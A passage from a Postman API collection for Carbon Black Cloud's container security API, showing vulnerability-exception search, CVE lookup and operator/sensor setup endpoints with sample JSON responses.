\"&lt;string&gt;\",\n      \"order\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"num_found\": &lt;integer&gt;,\n  \"results\": [\n    {\n      \"full_tag\": \"&lt;string&gt;\",\n      \"registry\": \"&lt;string&gt;\",\n      \"repo\": \"&lt;string&gt;\",\n      \"workloads_count\": &lt;integer&gt;,\n      \"created_by\": \"&lt;string&gt;\",\n      \"created_at\": \"&lt;string&gt;\",\n      \"comments\": \"&lt;string&gt;\"\n    }\n  ]\n}\n\n</code></pre>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","vulnerability_exceptions","cve","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"e907a27e-e14a-4f55-8c3c-c4438878438b","name":"Search Vulnerabilities Exceptions","originalRequest":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"criteria\": {\n        \"cve\": \"CVE-2010-0834\",\n        \"package\":\"base-files\",\n        \"type\": \"deb\"\n    },\n    \"query\": \"\",\n    \"start\": 0,\n    \"rows\": 1,\n    \"sort\": [\n        {\n            \"field\": \"vulnerabilities\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/vulnerability_exceptions/cve/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sun, 14 May 2023 19:44:46 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"237"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"671d19e2-5fd3-4b03-a0ce-01371aa176d8"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 2,\n    \"results\": [\n        {\n            \"full_tag\": \"123456789098.my.demo.server.demoorg.com/demo-k8s:v1.1.1-releasedemo.1\",\n            \"registry\": \"demoregistry.io\",\n            \"repo\": \"demorepo/kube-rbac-proxy\",\n            \"workloads_count\": 1,\n            \"created_by\": \"demnouser@demoorg.com\",\n            \"created_at\": \"2023-05-14T19:34:00.599Z\",\n            \"comments\": \"Setting CVE Exception for Demo\"\n        }\n    ]\n}"}],"_postman_id":"29659251-1e12-4cea-98f3-0d1e3a2e64e5"},{"name":"Get CVE","id":"7e5d61fa-7225-4436-8deb-1cc8cf6d1cd1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-AUTH-TOKEN"},{"key":"value","value":"{{apiKey}}"}]},"isInherited":false},"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/vulnerabilities?cve=ALAS-2021-1722&package=nspr&type=rpm","description":"<p>Return data about a specific CVE.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>workloads.container.image</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href>API Documentation</a></p>\n<h3 id=\"response-schema\">Response Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n\"id\": \"&lt;string&gt;\",\n \"package\": \"&lt;string&gt;\",\n \"package_name\": \"&lt;string&gt;\",\n \"package_type\": \"&lt;string&gt;\",\n \"package_version\": \"&lt;string&gt;\",\n  \"severity\": \"&lt;string&gt;\",\n  \"fix_available\": \"&lt;string&gt;\",\n  \"cve_key\": \"&lt;string&gt;\",\n  \"description\": \"&lt;string&gt;\",\n  \"link\": \"&lt;string&gt;\",\n  \"cvss_v2\": {},\n  \"cvss_v3\": {}\n}\n\n</code></pre>\n","urlObject":{"path":["containers","v1beta","orgs","{{cb_org_key}}","vulnerabilities"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>(Required) The CVE ID</p>\n","type":"text/plain"},"key":"cve","value":"ALAS-2021-1722"},{"description":{"content":"<p>(Required) The CVE package</p>\n","type":"text/plain"},"key":"package","value":"nspr"},{"description":{"content":"<p>(Required) The CVE type</p>\n","type":"text/plain"},"key":"type","value":"rpm"}],"variable":[{"id":"4903c944-9983-4ce8-bf22-740ac2a25689","type":"any","value":"<string>","key":"org_key"}]}},"response":[{"id":"c154737f-0590-4de5-8603-965c9aaef7e0","name":"Return data about specific CVE","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":{"raw":"{{cb_url}}/containers/v1beta/orgs/{{cb_org_key}}/vulnerabilities?cve=ALAS-2021-1722&package=nspr&type=rpm","host":["{{cb_url}}"],"path":["containers","v1beta","orgs","{{cb_org_key}}","vulnerabilities"],"query":[{"key":"cve","value":"ALAS-2021-1722","description":"(Required) The CVE ID"},{"key":"package","value":"nspr","description":"(Required) The CVE package"},{"key":"type","value":"rpm","description":"(Required) The CVE type"}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 02 May 2023 19:26:31 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"881"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"Content-Encoding","value":"gzip"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Psc-Correlation-Id","value":"a237053b-814e-4b17-9b55-4d4929e927c5"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"ALAS-2021-1722\",\n    \"package\": \"nspr\",\n    \"package_name\": \"nspr\",\n    \"package_type\": \"rpm\",\n    \"package_version\": \"4.21.0-1.amzn2.0.2\",\n    \"severity\": \"CRITICAL\",\n    \"fix_available\": \"4.32.0-1.amzn2\",\n    \"cve_key\": \"ALAS-2021-1722-nspr-rpm\",\n    \"description\": \"NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS \\\\#7, or PKCS \\\\#12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\",\n    \"link\": \"https://alas.aws.amazon.com/AL2/ALAS-2021-1722.html\",\n    \"cvss_v2\": {\n        \"access_complexity\": \"LOW\",\n        \"access_vector\": \"NETWORK\",\n        \"authentication\": \"NONE\",\n        \"availability_impact\": \"PARTIAL\",\n        \"confidentiality_impact\": \"PARTIAL\",\n        \"integrity_impact\": \"PARTIAL\",\n        \"vector_string\": \"AV:N/AC:L/Au:N/C:P/I:P/A:P\",\n        \"base_score\": 7.5,\n        \"exploitability_score\": 10,\n        \"impact_score\": 6.4\n    },\n    \"cvss_v3\": {\n        \"version\": \"3.1\",\n        \"attack_complexity\": \"LOW\",\n        \"attack_vector\": \"NETWORK\",\n        \"privileges_required\": \"NONE\",\n        \"scope\": \"UNCHANGED\",\n        \"user_interaction\": \"NONE\",\n        \"availability_impact\": \"HIGH\",\n        \"confidentiality_impact\": \"HIGH\",\n        \"integrity_impact\": \"HIGH\",\n        \"vector_string\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\n        \"base_score\": 9.8,\n        \"exploitability_score\": 3.9,\n        \"impact_score\": 5.9\n    }\n}"}],"_postman_id":"7e5d61fa-7225-4436-8deb-1cc8cf6d1cd1"}],"id":"5bd04cb2-4d74-4405-80c4-9d8650ae053d","_postman_id":"5bd04cb2-4d74-4405-80c4-9d8650ae053d","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Setup API","item":[{"name":"Get Operator Installation Data","id":"86d15a8d-80be-4d16-9689-e40527bba2aa","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy","description":"<h3 id=\"get-operator-installation-data\">Get Operator Installation Data</h3>\n<p>Returns data about the Carbon Black Containers Operator with metadata on how to install the Operator. This includes URLs to the Operator YAML for different Kubernetes versions as well as URLs to helper scripts that automate this for the customer.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container/latest/setup-api/#get-operator-installation-data\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{org_key}}","deploy"],"host":["{{cbc-hostname}}"],"query":[],"variable":[]}},"response":[{"id":"6122b5c6-aaae-4ef5-9cf3-0107b57ed93d","name":"Get Operator Installation Data","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 02 Oct 2023 13:18:46 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"606"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"e7356e70-c903-440e-9c79-16659326cfa5"}],"cookie":[],"responseTime":null,"body":"{\n    \"operator_url\": \"setup.test.containers.carbonblack.io/v6.0.2-rc1/operator.yaml\",\n    \"install_script_bash_url\": \"setup.test.containers.carbonblack.io/v6.0.2-rc1/operator-apply.sh\",\n    \"install_script_powershell_url\": \"setup.test.containers.carbonblack.io/v6.0.2-rc1/operator-apply.ps1\",\n    \"operator_setup_data\": [\n        {\n            \"min_kubernetes_version\": \"1.13\",\n            \"max_kubernetes_version\": \"1.15\",\n            \"url_to_yaml\": \"setup.test.containers.carbonblack.io/v6.0.2-rc1/operator-kubernetes-under-1-16.yaml\"\n        },\n        {\n            \"min_kubernetes_version\": \"1.16\",\n            \"max_kubernetes_version\": \"\",\n            \"url_to_yaml\": \"setup.test.containers.carbonblack.io/v6.0.2-rc1/operator.yaml\"\n        }\n    ]\n}"}],"_postman_id":"86d15a8d-80be-4d16-9689-e40527bba2aa"},{"name":"Get Sensor Metadata","id":"cae52abf-39f3-44bc-92d4-18521ae5eef2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/sensors","description":"<h3 id=\"get-sensor-metadata\">Get Sensor Metadata</h3>\n<p>Provides the list of Carbon Black Containers Sensor versions and what features are available for each version including what is the latest sensor version available.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container/latest/setup-api/#get-sensor-metadata\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{org_key}}","deploy","sensors"],"host":["{{cbc-hostname}}"],"query":[],"variable":[]}},"response":[{"id":"c23e1740-f0ff-4cee-a7cc-99cc697b444f","name":"Get Sensor Metadata","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/sensors"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 02 Oct 2023 13:38:51 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"1440"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"f1b4a20e-c9f5-4ed8-9083-f5284e66c369"}],"cookie":[],"responseTime":null,"body":"{\n    \"sensors\": [\n        {\n            \"version\": \"3.0.1\",\n            \"is_latest\": true,\n            \"supports_runtime\": true,\n            \"supports_cluster_scanning\": true,\n            \"supports_cluster_scanning_secrets\": true,\n            \"supports_cndr\": true\n        },\n        {\n            \"version\": \"3.0.0\",\n            \"is_latest\": false,\n            \"supports_runtime\": true,\n            \"supports_cluster_scanning\": true,\n            \"supports_cluster_scanning_secrets\": true,\n            \"supports_cndr\": true\n        },\n        {\n            \"version\": \"2.12.2\",\n            \"is_latest\": false,\n            \"supports_runtime\": true,\n            \"supports_cluster_scanning\": true,\n            \"supports_cluster_scanning_secrets\": false,\n            \"supports_cndr\": true\n        },\n        {\n            \"version\": \"2.12.1\",\n            \"is_latest\": false,\n            \"supports_runtime\": true,\n            \"supports_cluster_scanning\": true,\n            \"supports_cluster_scanning_secrets\": false,\n            \"supports_cndr\": true\n        },\n        {\n            \"version\": \"2.12.0\",\n            \"is_latest\": false,\n            \"supports_runtime\": true,\n            \"supports_cluster_scanning\": true,\n            \"supports_cluster_scanning_secrets\": false,\n            \"supports_cndr\": true\n        },\n        {\n            \"version\": \"2.11.2\",\n            \"is_latest\": false,\n            \"supports_runtime\": true,\n            \"supports_cluster_scanning\": true,\n            \"supports_cluster_scanning_secrets\": false,\n            \"supports_cndr\": true\n        },\n        {\n            \"version\": \"2.11.1\",\n            \"is_latest\": false,\n            \"supports_runtime\": true,\n            \"supports_cluster_scanning\": true,\n            \"supports_cluster_scanning_secrets\": false,\n            \"supports_cndr\": true\n        },\n        {\n            \"version\": \"2.11.0\",\n            \"is_latest\": false,\n            \"supports_runtime\": true,\n            \"supports_cluster_scanning\": true,\n            \"supports_cluster_scanning_secrets\": false,\n            \"supports_cndr\": true\n        },\n        {\n            \"version\": \"2.10.0\",\n            \"is_latest\": false,\n            \"supports_runtime\": true,\n            \"supports_cluster_scanning\": true,\n            \"supports_cluster_scanning_secrets\": false,\n            \"supports_cndr\": true\n        }\n    ]\n}"}],"_postman_id":"cae52abf-39f3-44bc-92d4-18521ae5eef2"},{"name":"Get Full Operator Compatibility","id":"f6fff2ad-9cd4-49b7-a82f-29b1b7f9cf16","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/compatibility","description":"<h3 id=\"get-full-operator-compatibility\">Get Full Operator Compatibility</h3>\n<p>Returns the compatibility matrix specifying which sensor are compatible to which operator version.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container/latest/setup-api/#get-full-operator-compatibility\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{org_key}}","deploy","compatibility"],"host":["{{cbc-hostname}}"],"query":[],"variable":[]}},"response":[{"id":"c4932349-59f3-49fe-8f00-86d5983a158a","name":"Get Full Operator Compatibility","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/compatibility"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 02 Oct 2023 13:40:20 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"325"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"a1f92ef3-1468-48f2-979b-cc7cb89730ab"}],"cookie":[],"responseTime":null,"body":"{\n    \"matrix\": {\n        \"5.5.0\": {\n            \"min_agent\": \"2.10.0\",\n            \"max_agent\": \"2.11.0\"\n        },\n        \"5.6.0\": {\n            \"min_agent\": \"2.10.0\",\n            \"max_agent\": \"2.12.2\"\n        },\n        \"5.6.1\": {\n            \"min_agent\": \"2.10.0\",\n            \"max_agent\": \"2.12.2\"\n        },\n        \"5.6.2\": {\n            \"min_agent\": \"2.10.0\",\n            \"max_agent\": \"2.12.2\"\n        },\n        \"6.0.0\": {\n            \"min_agent\": \"2.10.0\",\n            \"max_agent\": \"latest\"\n        },\n        \"6.0.1\": {\n            \"min_agent\": \"2.10.0\",\n            \"max_agent\": \"latest\"\n        }\n    }\n}"}],"_postman_id":"f6fff2ad-9cd4-49b7-a82f-29b1b7f9cf16"},{"name":"Get Operator Compatibility","id":"33f8289b-f79f-4d66-910e-041e1fae88ec","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/compatibility/{{operator_version}}","description":"<h3 id=\"get-operator-compatibility\">Get Operator Compatibility</h3>\n<p>Returns the compatibility matrix entry specifying which sensor versions are compatible with {operator_version}.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container/latest/setup-api/#get-operator-compatibility\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{org_key}}","deploy","compatibility","{{operator_version}}"],"host":["{{cbc-hostname}}"],"query":[],"variable":[]}},"response":[{"id":"a9d2fd9c-1e0a-49b1-a22d-09fda6d0e77d","name":"Get Operator Compatibility","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/compatibility/6.0.0"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 02 Oct 2023 13:41:31 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"44"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"1485e165-882b-4484-9739-e632e51bd380"}],"cookie":[],"responseTime":null,"body":"{\n    \"min_agent\": \"2.10.0\",\n    \"max_agent\": \"latest\"\n}"}],"_postman_id":"33f8289b-f79f-4d66-910e-041e1fae88ec"},{"name":"Get Download Links for CLI","id":"56845816-af22-4008-b939-891598158239","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/cli_instances/download_links","description":"<h3 id=\"get-download-links-for-cli\">Get Download Links for CLI</h3>\n<p>Returns the CLI download links for OSX and Linux.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container/latest/setup-api/#download-links-for-cli\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{org_key}}","deploy","cli_instances","download_links"],"host":["{{cbc-hostname}}"],"query":[],"variable":[]}},"response":[{"id":"94aa9e64-8798-4e1e-bb3f-5ded8c67a026","name":"Get Download Links for CLI","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access Key"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/cli_instances/download_links"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 02 Oct 2023 13:43:04 GMT"},{"key":"Content-Type","value":"application/json; charset=UTF-8"},{"key":"Content-Length","value":"587"},{"key":"Connection","value":"keep-alive"},{"key":"Access-Control-Allow-Credentials","value":"true"},{"key":"Access-Control-Allow-Headers","value":"DNT,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type,Range,Authorization"},{"key":"Access-Control-Allow-Methods","value":"GET, PUT, POST, DELETE, PATCH, OPTIONS"},{"key":"Access-Control-Allow-Origin","value":"*"},{"key":"Access-Control-Max-Age","value":"1728000"},{"key":"X-Psc-Correlation-Id","value":"f5530e83-d0e8-49ff-8fb3-1815630c9a4d"}],"cookie":[],"responseTime":null,"body":"{\n    \"mac\": {\n        \"version\": \"v1.10.2\",\n        \"download_link\": \"https://setup.containers.carbonblack.io/cbctl/v1.10.2/darwin/cbctl\",\n        \"md5_sum\": \"d6c257425dd403be0c097c7f54e6acad\",\n        \"sha1_sum\": \"3a6d8b38ca135b77bf30a8564e16d9e60d21bee0\",\n        \"sha256_sum\": \"ac9f1b220e116658b47f3349e93faab940d23b0d2c4651e3b746a02d6270efb5\"\n    },\n    \"linux\": {\n        \"version\": \"v1.10.2\",\n        \"download_link\": \"https://setup.containers.carbonblack.io/cbctl/v1.10.2/linux/cbctl\",\n        \"md5_sum\": \"bfa9e95b6b5df4d1bcd32af7f6cd7907\",\n        \"sha1_sum\": \"355d694bd2c36a04bfd3e758fdba997f3a70d396\",\n        \"sha256_sum\": \"d4781d7b3597847e62d9e2f7d1713762d8083a2c380c277e1035ae4f0bcc8f1f\"\n    }\n}"}],"_postman_id":"56845816-af22-4008-b939-891598158239"},{"name":"Get CLI Installation Command","id":"77803ba8-53ac-4cf4-950e-933c15bca401","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"<p>(Required) Carbon Black Access Key</p>\n"},{"key":"Accept","value":"application/json"}],"url":"{{cbc-hostname}}/containers/v1/orgs/{{org_key}}/deploy/cli_instances/setup_command","description":"<h3 id=\"get-cli-installation-command\">Get CLI Installation Command</h3>\n<p>Returns the CLI instance installation command.</p>\n<p>Permissions Required</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>kubernetes.security</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/container/latest/setup-api/#cli-installation-command\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["containers","v1","orgs","{{org_key}}","deploy","cli_instances","setup_command"],"host":["{{cbc-hostname}}"],"query":[],"variable":[]}},"response":[{"id":"75816b71-cfd7-47b7-9349-c51bc8089d23","name":"Get CLI Installation Command","originalRequest":{"method":"GET","header":[{"key":"X-AUTH-TOKEN","value":"<string>","description":"(Required) Carbon Black Access 